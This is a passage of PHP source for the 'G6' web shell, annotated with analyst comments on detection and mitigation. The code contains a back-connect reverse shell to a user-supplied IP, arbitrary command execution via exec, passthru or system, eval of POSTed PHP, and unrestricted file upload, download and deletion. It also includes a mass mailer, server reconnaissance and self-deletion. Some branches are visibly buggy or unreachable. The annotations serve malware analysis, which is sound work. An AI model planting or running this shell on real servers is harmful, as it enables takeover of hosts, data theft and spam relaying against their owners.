                if(strlen($hash)==32){
                        $hashresult == "MD5 Hash";
                }elseif(strlen($hash)==40){
                        $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
                }elseif(strlen($hash)==13){
                        $hashresult = "DES(Unix) Hash";
                }elseif(strlen($hash)==16){
                        $hashresult = "MySQL Hash / /DES(Oracle Hash)";
                }elseif(strlen($hash)==41){
                        $GetHashChar = substr($hash, 40);
                        if($GetHashChar == "*"){
                                $hashresult = "MySQL5 Hash";
                        }      
                }elseif(strlen($hash)==64){
                        $hashresult = "SHA-256 Hash";
                }elseif(strlen($hash)==96){
                        $hashresult = "SHA-384 Hash";
                }elseif(strlen($hash)==128){
                        $hashresult = "SHA-512 Hash";
                }elseif(strlen($hash)==34){
                        if(strstr($hash, '$1$')){
                                $hashresult = "MD5(Unix) Hash";
                        }      
                }elseif(strlen($hash)==37){
                        if(strstr($hash, '$apr1$')){
                                $hashresult = "MD5(APR) Hash";
                        }      
                }elseif(strlen($hash)==34){
                        if(strstr($hash, '$H$')){
                                $hashresult = "MD5(phpBB3) Hash";
                        }      
                }elseif(strlen($hash)==34){
                        if(strstr($hash, '$P$')){
                                $hashresult = "MD5(Wordpress) Hash";
                        }      
                }elseif(strlen($hash)==39){
                        if(strstr($hash, '$5$')){
                                $hashresult = "SHA-256(Unix) Hash";
                        }      
                }elseif(strlen($hash)==39){
                        if(strstr($hash, '$6$')){
                                $hashresult = "SHA-512(Unix) Hash";
                        }      
                }elseif(strlen($hash)==24){
                        if(strstr($hash, '==')){
                                $hashresult = "MD5(Base-64) Hash";
                        }      
                }else{
                        $hashresult = "Hash type not found";
                }
        }else{
                $hashresult = "Not Hash Entered";
        }
        ?>
        <center>
                <form action="" method="POST"><table><tr class="optionstr"><td>Enter Hash:</td> <td><input type="text" name="hash" class="command" /></td><td><input type="submit" name="gethash" value="Identify Hash" /></td></tr><tr class="optionstr"><td>Result: </td><td><?php echo $hashresult; ?></td></tr></table></form>
        </center>
       
        <?php
 
}elseif(strstr($CurrentUrl, "YmNrbmV0")){
        get_srv_info();
        echo '
<div id="back">
           <h2>Back Connect</h2>
           <p>Back connect will allow you to enter system commands remotely.</p>
           <p>
           <table>
                                <form action="" method="post">
                                <tr class="optionstr"><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
                                <tr class="optionstr"><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
                                <tr class="optionstr"><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
                                </form>
                                </table>';
                                if(isset($_POST['bind']))
                                        {
                                                echo "<p>Attempting Connection...</p>";
                                                $ip = $_POST['ip'];
                                                $port= $_POST['port'];
                                                $sockfd=fsockopen($ip , $port , $errno, $errstr );
                                                if($errno != 0){echo "<font color='red'><b>$errno</b> : $errstr</font>";}else if (!$sockfd)     {$result = "<p>Unexpected error has occured, connection may have failed.</p>";} else {fputs ($sockfd ,"\n{################################################################}\n..:: G6 W3b Sh3ll v1.1- Coded By Mr. P-teo ::..\n\n=> Backconnect \n=> Back        \n
                                                         \n{################################################################}"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)){ $cmdPrompt = '[G6]#:> ';fputs ($sockfd , $cmdPrompt );$command= fgets($sockfd, $len);
                                                        fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd);}}
                echo "</p></div>";
 
}elseif(strstr($CurrentUrl, "bWtmbA")){
        get_srv_info();
        echo "<p>If no file path is included it will be created within the same directory as the shell.</p><form action='' method='post'><p>Filename: <input type='text' name='newfilename' /></p><p><input type='submit' value='Create File' name='create' /></p></form>";
                $newfilename = htmlentities($_POST['newfilename']);
        if(isset($_POST['create'])){$ourFileName = $newfilename;$ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");fclose($ourFileHandle);}
        echo "<br /><br />";
}elseif(strstr($CurrentUrl, "bWtkaXI")){
        get_srv_info();
        echo "<p>If no file path is included directory will be created within the same directory as the shell.</p>
                <form action='' method='post'>
                <p>Directory Name: <input type='text' name='newdirname' /></p>
                <p><input type='submit' value='Create New Directory' name='createdir' /></p>
                </form>";
        $newdirname = htmlentities($_POST['newdirname']);
        if(isset($_POST['createdir'])){
                $ourdirName = $newdirname;
                mkdir($ourdirName, 0777);
                echo "Directory Created!";
        }
        echo "
                <br /><br />";
}elseif(strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")){
                get_srv_info();
                $upload = $file_explorer;
                echo '<p><form action="" method="POST"><table><tr class="optionstr"><td><input class="chdir" type="text" name="chdir" value="'.$file_explorer.'"" /></td><td></td></form><td><div id="options"><a href="'.$CurrentUrl.'">Refresh Files</a></div></td><td><div id="options"><!--<a href="?bWtkaXI='.$file_explorer.'">Make Directory</a> | <a href="?bWtmbA='.$file_explorer.'">Make File</a> | <a href="?dXBsb2Fk='.$upload.'">Upload</a></div>--></td></tr>';
                if(isset($_POST['godir'])){$mandircha = $_POST['chdir'];if($mandircha){ header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_POST['chdir']);}}
        ?>
        </div></p>
                        <table class="FileBrowserTable"><tr><td class="TableHeader_Name"> FileName's</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableHeader">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>
                <?php
 
                $Shell_Directory = $_SERVER['REMOTE_DIR'];
                        //load files...        
 
                /**
                 * Returns a display label for a path in the file-explorer table.
                 *
                 * "Directory" is returned when is_dir() is true, and also when the path is not a
                 * directory but contains no "." at all. Otherwise the text after the last "." of the
                 * whole path string is returned, so a dot in a parent directory name affects the result.
                 *
                 * Analyst note: end() takes its argument by reference; here it receives the result of
                 * explode() directly.
                 */
                function GetFileType($file){
                        if(!is_dir($file)){
                                // strstr() is used only as a "contains a dot" test.
                                if(strstr($file, ".")){
                                        $FileExt = end(explode(".", $file));
                                        return $FileExt;
                                }else{
                                        // Extension-less files are labelled "Directory" as well.
                                        return "Directory";
                                }
                        }else{
                                $Directory = "Directory";
                                return $Directory;
                        }
                }
 
               
 
 
/**
 * Returns the size column for the file-explorer table.
 *
 * For anything that is not a directory: filesize() divided by 1024, rounded to two
 * decimals, followed by " Kb". For a directory: the literal "Not Availible".
 */
function GetFileSize($file){
        if(!is_dir($file))
                return round(filesize($file) / 1024, 2) . " Kb";
        else
                return "Not Availible";
}
 
/**
 * Returns the path's modification time (filemtime) formatted as m/d/y and wrapped in
 * a <center> element, for the "Last Modified" column of the file-explorer table.
 */
function LastModified($file){
                return  "<center>".date("m/d/y", filemtime($file))."</center>";
}
 
/**
 * Builds the "Permisions" column of the file browser.
 *
 * The three checks report what the account running PHP can do with the path
 * (effective access), not the file's mode bits. Each missing right is shown as "?".
 *
 * Analyst note: this column tells the operator which paths the web server account
 * can modify. Keeping the web root owned by a different account and read-only for
 * the PHP user limits what a script like this can change.
 *
 * @param string $file Path to test.
 * @return string "<center>" element holding the three flags joined by "--".
 */
function permissions($file){
        if(is_readable($file)){
                $readable = "r";
        }else{
                $readable = "?";
        }
        if(is_writable($file)){
                $writable = "w";
        }else{
                $writable = "?";
        }
        if(is_executable($file)){
                $executable = "x";
        }else{
                $executable = "?";
        }
 
// Full access (r--w--x) is rendered in a lighter colour; every other combination uses the cell's own colour.
if($readable."--".$writable."--".$executable == "r--w--x"){
        return "<center style='color:#f1f1f1;'>".$readable."--".$writable."--".$executable."</center>";
}else{
        return "<center>".$readable."--".$writable."--".$executable."</center>";
}
}
 
                // Directory listing for the file browser.
                // Entries come from scandir($file_explorer), while every link and stat path is built from the
                // raw query parameter ZmlsZV9leHBsb3Jlcg (unpadded base64 of "file_explorer"). How $file_explorer
                // relates to that parameter is decided outside the visible code.
                //
                // Detection: requests to this script whose query string carries ZmlsZV9leHBsb3Jlcg=, readfile=,
                // delete= or downlfile= followed by a filesystem path are strong access-log indicators.
                //
                // File names and paths are written into the HTML without htmlspecialchars() or urlencode(),
                // so a name containing markup is rendered as markup when this page is viewed.
                $Files = scandir($file_explorer);
        foreach($Files as $File){
                if($File == ".."){
                        $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
                        // Parent link: cut the path at its last "/".
                        $currentDirectory = substr($currentDirectory, 0, strrpos($currentDirectory, "/"));
                        echo "<tr><td><a href='?ZmlsZV9leHBsb3Jlcg=" .$currentDirectory. "'>" . $File . "</a></td><td></td><td></td><td></td><td></td><td></td></tr>";
 
                }elseif($File == "."){
                        // Same as the current directory; no row is printed.
 
                }else{
                        $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
                        $type = GetFileType($currentDirectory. "/" .$File);
                        if($type == "Directory"){
                                // Directory row: the name links back into this browser one level deeper.
                                echo "<tr><td><a class='flink' title='Explore Directory' href='?ZmlsZV9leHBsb3Jlcg=" .$currentDirectory. "/" .$File. "'>" . $File . "/</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory. "/" .$File) . "</td><td style='color:red;'>".permissions($currentDirectory. "/" .$File)."</td><td>" . LastModified($currentDirectory. "/" .$File) . "</td><td>Not Availible</td></tr>";
                        }else{
                                // File row: E = edit/view (?readfile=), B = delete (?delete=), D = download (?downlfile=...&file=).
                                echo "<tr><td><a class='flink' title='Edit File' href='?readfile=" .$currentDirectory. "/" .$File. "'>" . $File . "</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory. "/" .$File) . "</td><td style='color:red;'>".permissions($currentDirectory. "/" .$File)."</td><td>" . LastModified($currentDirectory. "/" .$File) . "</td><td><a href='?readfile=" .$currentDirectory. "/" .$File. "' title='Edit File'>E</a> - <a href='?delete=" .$currentDirectory. "/" .$File. "' title='Bin the Document'>B</a> - <a href='?downlfile=".$currentDirectory. "/" .$File."&file=".$File."' title='Download File'>D</a></td></tr>";
                        }
                }
        }
               
?>
</table>
<div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;" ></div>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>File Upload</h4><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" /><br /><input type="submit" name="upload" value="Upload File" /></form></div>
        <?php
        // Upload handler (capability: drop further files onto the host).
        // The destination is $file_explorer plus the client-supplied file name; there is no check of
        // extension, type or size, and the result of move_uploaded_file() is ignored, so the
        // "successfully uploaded" alert is printed even when the move failed.
        // Detection: multipart POSTs to this script with the fields "upload" and "file", and new or
        // changed files in web-writable directories (file-integrity monitoring).
        // Mitigation: keep upload directories non-executable and outside the set of paths the
        // interpreter will run.
        if(isset($_POST['upload'])){if(isset($_FILES['file'])){ move_uploaded_file($_FILES["file"]["tmp_name"], $file_explorer."/". $_FILES["file"]["name"]);echo '<script>alert("File successfully uploaded, enjoy.");</script>';}     }
        ?>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>Create Directory</h4>
        <form action="" method="post"><input type="text" name="dirname" /><br /><input type="submit" name="createdir" value="Create Dir" /></form></div>
        <?php
                // Directory creation from the POST field "dirname", appended to $file_explorer unfiltered.
                // The mode argument is the decimal literal 777 (octal 01411), not 0777, so directories
                // made through this form end up with an unusual mode once the umask is applied; that
                // can help tell them apart from directories the application created itself.
                // On failure die() prints the attempted path and ends the request.
                if(isset($_POST['createdir'])){if(strlen($_POST['dirname']) > 0){mkdir($file_explorer."/".$_POST['dirname'], 777) or die($file_explorer."/".$_POST['dirname']);}}
        ?>
                <br /><br /><br />
<?php
 
               
}elseif(strstr($CurrentUrl, "downlfile")){
                        // "downlfile" branch: file download endpoint (capability: read files off the host).
                        // The author's earlier header-based attempt is left commented out below.
                        /*$type = mime_content_type($currentDirectoryFileDl);
                        header('Content-Type: '.$type);
                        header('Content-Disposition: attachment; filename="'.$currentDirectoryFileDl.'"');*/
                        // The "file" query parameter is taken as-is and used only as the suggested download name.
                        $file = $_GET['file'];
                        // header('Content-Type: application/force-download'); Non-standard MIME-Type, incompatible with Samsung C3050 for example. Let it commented
                        //readfile($currentDirectoryFileDl);
                        // $currentDirectoryFileDl is not assigned in the visible code; presumably it is derived
                        // from the "downlfile" query parameter above - verify against the full sample.
                        // Analyst note: forceDL() is declared further down inside this same conditional branch.
                        // PHP binds such declarations only when execution reaches them, so unless an earlier
                        // declaration exists outside the visible part this call ends in a "Call to undefined
                        // function" fatal error, which would be recorded in the PHP error log.
                        forceDL($currentDirectoryFileDl, $file);
                        /**
         * forceDL
         *
         * Sends the file at $filePath to the client as an attachment, then ends the request.
         *
         * Analyst notes:
         * - The function puts no restriction on $filePath: any file the PHP process can read
         *   is streamed back.
         * - $fileName is written into the Content-disposition header unfiltered; at the visible
         *   call site it comes straight from the "file" query parameter.
         * - Responses carry "Content-Type: application/force-download", a non-standard type
         *   that is useful as a proxy or WAF log indicator.
         *
         * @param string $filePath Path to the selected download
         * @param string $fileName Name of file to be saved, can be anything honestly
         */
        function forceDL($filePath, $fileName) {
                /* Required for IE (author's note): turn off zlib output compression for this response. */
                if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off');  }
               
                /*
                Author's troubleshooting note, kept from the sample:
                Files not downloading with correct headers?
                1) Open file in Notepad++ (or similar) and check for white-space or other code (php code)
                2) Extra code?
                3) Problem found.
                4) Profit
                Should answer most questions
                */
               
                /* Headers */
                header('Pragma: public');
                header('Expires: 0');
                header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
                header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($filePath)).' GMT');
                header('Cache-Control: private', false);
                header('Content-Type: application/force-download');
                header('Content-disposition: attachment; filename="' . $fileName . '"');
                header('Content-Transfer-Encoding: binary');
                header('Content-length: ' . filesize($filePath));
                readfile($filePath);
                // Written after the file bytes, so the body is longer than the Content-length sent above;
                // clients that do not stop at Content-length receive the path and name as a trailer.
                echo $filePath.$fileName;
                exit();
        }
 
}elseif(strstr($CurrentUrl, "kueqymass")){
        get_srv_info();
        ?>
                <strong>Mass Mailer</strong>
                <p>Be warned using the mass mailing feature may attract attention to your G6 shell. Seperate each email with <strong>;</strong></p>
                <form action="" method="post">
                        <table><tr><td>To Email(s): </td><td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" /></tr><tr><td>Subject: </td>       <td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" /></td></tr><tr><td>From Email: </td><td><input type="email" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td></tr><tr><td>Message: </td><td></td></tr></table><table><tr><td><textarea style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea></td></tr><tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr></table></form>
                        <?php
        // Mass-mailer handler (branch marker "kueqymass"): turns the host into a mail relay.
        // When all four POST fields are non-empty, the "email" field is split on ";" and mail() is
        // called once per address. "fromEmail" is concatenated into the extra-headers argument
        // unfiltered, so the sender controls that header block.
        // Detection: outbound mail volume from the web server account in the MTA logs; PHP's
        // mail.log and mail.add_x_header settings record or tag the originating script.
        if(isset($_POST['send'])){ $email = $_POST['email'];$subject = $_POST['subject'];$from = $_POST['fromEmail'];$message = $_POST['message'];if($email&&$subject&&$from&&$message){$emails = explode(";", $email);foreach($emails as $email){mail($email, $subject, $message, "From: ".$from);     }}}
}elseif(strstr($CurrentUrl, "delete")){
        // "delete" branch: removes a file with unlink() or a directory with rmdir(), which only
        // succeeds on an empty directory. $delete is not assigned in the visible code; presumably it
        // mirrors the "delete" query parameter - verify against the full sample.
        // Branches are selected by substring match on $CurrentUrl, so any URL containing "delete"
        // that did not match an earlier branch lands here.
        if(!is_dir($delete)){unlink($delete);}else{rmdir($delete);}
                // Redirects to the client-supplied Referer header; the value is not validated.
                header("Location: ".$_SERVER['HTTP_REFERER']);
}elseif(strstr($CurrentUrl, "c3J2aW5mbw")){
        // Server-information branch (marker c3J2aW5mbw, unpadded base64 of "srvinfo"): host
        // reconnaissance. It prints the port, OS string from php_uname(), PHP version, loaded curl
        // extension, request headers and the disabled-function list. The fixed labels
        // ("<b>Safe Mode: </b>", "<strong>Disabled Functions: </strong>") are usable as
        // response-body signatures. get_srv_info() is defined outside the visible code.
        get_srv_info();
  $s_safemode = ini_get("safe_mode");
  // Analyst note: "=" assigns TRUE instead of comparing, so the page always reports Safe Mode [ON]
  // whatever ini_get() returned. safe_mode itself was removed in PHP 5.4.
  if($s_safemode = TRUE){$s_safemode = "<span class='enabled'>[ON";}else{$s_safemode = "<span class='disabled'>[OFF"; }
  if(extension_loaded('curl')){$curls="<span class='enabled'>[ON]</span>";}else{$curls="<span class='disabled'>[OFF]</span>";}
        echo "<b>Server Port: </b>".$_SERVER['SERVER_PORT']."<br /><br /><b>HTTP Connection: </b>".$_SERVER['HTTP_CONNECTION']."<br /><br /><b>Operating System:</b> ".php_uname()."<br /><br />";
        // get_magic_quotes_gpc() was removed in PHP 8.0; on such a host this branch stops here with
        // an undefined-function fatal error.
        if(get_magic_quotes_gpc()){echo "<b>Magic Quotes:</b> <span class='enabled'>[ENABLED]</span><br /><br />";}else{echo "<b>Magic Quotes:</b> <span class='disabled'>[DISABLED]</span><br /><br />";}
        echo "<b>PHP Version:</b> ".phpversion()."<br /><br /><b>Safe Mode: </b>".$s_safemode."]</span><br /><br /><b>Curl: </b>".$curls."<br /><br /><b>Accept Encoding: </b> ".$_SERVER['HTTP_ACCEPT_ENCODING']."<br /><br /><b>Admin: </b>".$_SERVER['SERVER_ADMIN']."<br /><br /><strong>Disabled Functions: </strong>";
        // $disabled is not assigned in the visible code; presumably it holds the parsed
        // disable_functions setting - verify against the full sample.
        if(!empty($disabled)){
        foreach($disabled as $functionsdis){
                echo $functionsdis.", ";
        }
        }else{
                echo "none";
        }
        echo "<br /><br /><strong>/etc/passwd: </strong>";
        // The label says /etc/passwd but the path tested is /home/etc/passwd, so the result shown
        // does not describe /etc/passwd.
        if(is_readable("/home/etc/passwd")){
                echo "<span style='color:green;'>Readable</span>";
        }else{
                echo "<span style='color:red;'>Unreadable</span>";
        }
}elseif(strstr($CurrentUrl, "dGVybWlhbmw")){
       
        get_srv_info();
        ?>
                <p>Command line execution via exec, passthru or system.</p>
               
                <form action="" method="post"><table><tr><td><b>Command Execution: </b></td><td><input type="text" placeholder="root~$ " autocomplete="off" name="command" class="command"/></td></tr></table>
        <?php
                // Command-execution branch (marker dGVybWlhbmw, unpadded base64 of "termianl"):
                // the POST field "command" is handed to the operating system shell with the
                // privileges of the PHP process. cmd() is defined outside the visible code; its return
                // value is compared with "exec", "passthru" and "system" to choose the call.
                // There is no isset() guard on the field, so this block runs on every request that
                // reaches the branch.
                //
                // Detection: the web server or PHP worker spawning shell child processes; POST bodies
                // with a "command" field; response bodies containing "Using: exec => ",
                // "Using: passthru => " or "Using: system => ".
                // Mitigation: list exec, passthru, system and their siblings in disable_functions where
                // the application does not need them. The eval branch of this script is not covered by
                // that setting.
                $out = array();
                if(cmd()=="exec"){
                        echo "Using: exec => ";
                        // exec() fills $out with the output lines, which are echoed unescaped.
                        exec($_POST['command'], $out);
                        foreach ($out as $line) {
                                echo "$line\n";
                        }
                }elseif (cmd()=="passthru") {  
 
                        echo "Using: passthru => ";                    
                        // passthru() writes the output itself; its second argument receives the integer
                        // exit status, so the loop below has nothing to iterate.
                        passthru($_POST['command'], $out);
                        foreach ($out as $line) {
                                echo "$line\n";
                        }
                }elseif(cmd()=="system"){
                        echo "Using: system => ";
                        // system() also prints the output directly and stores the exit status in $out.
                        system($_POST['command'], $out);
                        foreach ($out as $line) {
                                echo "$line\n";
                        }
                }
}elseif(strstr($CurrentUrl, "a253aXN1ZQ")){
        // "Known issues" page (marker a253aXN1ZQ, unpadded base64 of "knwisue").
        // The banner below names the tool ("G6 Shell"), its edition and the author handle; these
        // fixed strings are usable as content signatures when scanning files or response bodies.
        // $shellVersion and get_srv_info() are defined outside the visible code.
        get_srv_info();
        echo "
                <h4>Information</h4>
                <p>G6 Shell v".$shellVersion." Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.</p>";
 
                ?>
                <ul>
                        <li>is_dir function not returning correct result within child dirs of the file browser.</li>
                        <li>File Browser controls, e.g. rename, create file, delete full dir.</li>
                        <li>Editing can run into trouble with GET Method Not Implemented error.</li>
                </ul>
                <br /><br />
        <?php
}elseif(strstr($CurrentUrl, "?eval")){
        get_srv_info();
        ?>
        <div style="float:left;width:700px;">
        <h4>Eval (PHP code execution)</h4>
        <form action="" method="post">
                <textarea name="phpeval" style="width:700px;height:190px;padding:5px;background:#CCCCCC;">//Example, get all PHP info about the server
 
echo phpinfo();</textarea><br />
                <input style="padding:4px 10px;margin:10px 0px;" name="evalexecute" value="Execute Code" type="submit"/>
        </form>
        </div>
        <div style="float:right;width:250px;">
                <h4>Information</h4>
                <p>Enter your specified php code within the textarea and wait for the response.</p>
                <p><strong>Example: </strong><i>echo phpinfo();</i></p><br /><br />
                <h4>Warning</h4>
                <p>including external files with seperate stylesheets may affect the apearence of G6 styles.</p>
        </div>
        <?php
                // Eval handler (branch marker "?eval"): the POST field "phpeval" is executed as PHP
                // code inside this script's process.
                // eval is a language construct, so disable_functions does not block it; on hosts that
                // rely on that setting this path stays available.
                // Detection: static scans for eval() applied to request superglobals; POST bodies with
                // the fields "phpeval" and "evalexecute".
                if(isset($_POST['evalexecute'])){
                        eval($_POST['phpeval']);
                }
}elseif(strstr($CurrentUrl, "?srmve")){
                get_srv_info();
        ?>
        <p>If you are sure you wish to remove the shell click the button below, make sure you are certain as you wil only have one shot at this.</p>
        <form action="" method="post">
                <center><input style="padding:7px 15px;margin:10px 0px;" name="Remove" value="Remove Shell" type="submit"/></center>
        </form>
        <?php
        // Self-removal (branch marker "?srmve"): a POST with the "Remove" field deletes this
        // script from disk.
        // Incident-response note: the file may be gone by the time a host is examined, so its
        // absence does not rule out earlier use. Access logs, backups and file-integrity records
        // are the places to look for it.
        if(isset($_POST['Remove'])){
                if(file_exists(__FILE__)){
                        unlink(__FILE__);
                }
        }
}else{
        get_srv_info();
 
?>
        <br /><br /><br /><br /><div class='Logo'>G6 v<?php echo $shellVersion; ?></div><div class='logotext'>Private Shell Coded By Mr. P-teo</div><br /><br /><br />
        <?php
}
// Sends the buffered page to the client. The script issues header("Location: ...") calls after it
// has already printed markup, which only works while output is buffered; the matching
// ob_start() is presumably above the visible code.
ob_flush();
?>
</div>
<body>
</html>